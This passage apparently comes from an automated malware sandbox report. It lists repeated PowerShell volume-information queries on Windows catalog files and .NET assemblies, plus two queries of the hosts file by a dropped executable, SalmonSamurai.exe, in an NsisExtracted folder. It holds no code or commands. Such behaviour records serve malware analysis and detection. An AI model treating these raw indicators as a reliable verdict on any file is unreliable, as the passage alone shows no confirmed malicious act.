Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
